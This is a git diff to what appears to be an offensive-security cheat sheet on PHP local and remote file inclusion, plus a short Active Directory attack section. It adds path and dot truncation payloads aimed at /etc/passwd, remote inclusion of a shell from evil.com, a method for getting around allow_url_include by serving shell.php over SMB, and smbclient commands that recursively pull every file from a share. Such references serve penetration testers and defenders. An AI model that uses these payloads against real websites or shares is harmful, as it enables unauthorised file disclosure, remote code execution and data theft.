diff --git a/File Inclusion/README.md b/File Inclusion/README.md index 1f48d44..3610363 100644 --- a/File Inclusion/README.md +++ b/File Inclusion/README.md @@ -9,7 +9,7 @@ * [Basic LFI](#basic-lfi) * [Null byte](#null-byte) * [Double encoding](#double-encoding) - * [Path truncation](#path-truncation) + * [Path and dot truncation](#path-and-dot-truncation) * [Filter bypass tricks](#filter-bypass-tricks) * [Basic RFI](#basic-rfi) * [LFI / RFI using wrappers](#lfi--rfi-using-wrappers) @@ -48,14 +48,15 @@ http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00 ``` -### Path truncation +### Path and dot truncation On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away. ```powershell -http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\. -http://example.com/index.php?page=../../../etc/passwd/././././././././/././././././././././[ADD MORE] -http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd +http://example.com/index.php?page=../../../etc/passwd............[ADD MORE] +http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE] +http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] +http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd ``` ### Filter bypass tricks @@ -68,6 +69,8 @@ http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C ## Basic RFI +Most of the filter bypasses from LFI section can be reused for RFI. + ```powershell http://example.com/index.php?page=http://evil.com/shell.txt ``` @@ -84,6 +87,15 @@ http://example.com/index.php?page=http://evil.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt ``` +### Bypass allow_url_include + +When `allow_url_include` and `allow_url_fopen` are set to `Off`. It is still possible to include a remote file on Windows box using the `smb` protocol. + +1. Create a share open to everyone +2. Write a PHP code inside a file : `shell.php` +3. Include it `http://example.com/index.php?page=\\10.0.0.1\share\shell.php` + + ## LFI / RFI using wrappers ### Wrapper php://filter @@ -293,3 +305,4 @@ login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/s * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf) * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/) * [CVV #1: Local File Inclusion - @SI9INT - Jun 20, 2018](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a) +* [Exploiting Remote File Inclusion (RFI) in PHP application and bypassing remote URL inclusion restriction](http://www.mannulinux.org/2019/05/exploiting-rfi-in-php-bypass-remote-url-inclusion-restriction.html?m=1) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 30de1a2..95f954a 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -152,6 +152,17 @@ cd Folder # move inside a folder ls # list files ``` +Download a folder recursively + +```powershell +smbclient //10.0.0.1/Share +smb: \> mask "" +smb: \> recurse ON +smb: \> prompt OFF +smb: \> lcd '/path/to/go/' +smb: \> mget * +``` + Mount a share ```powershell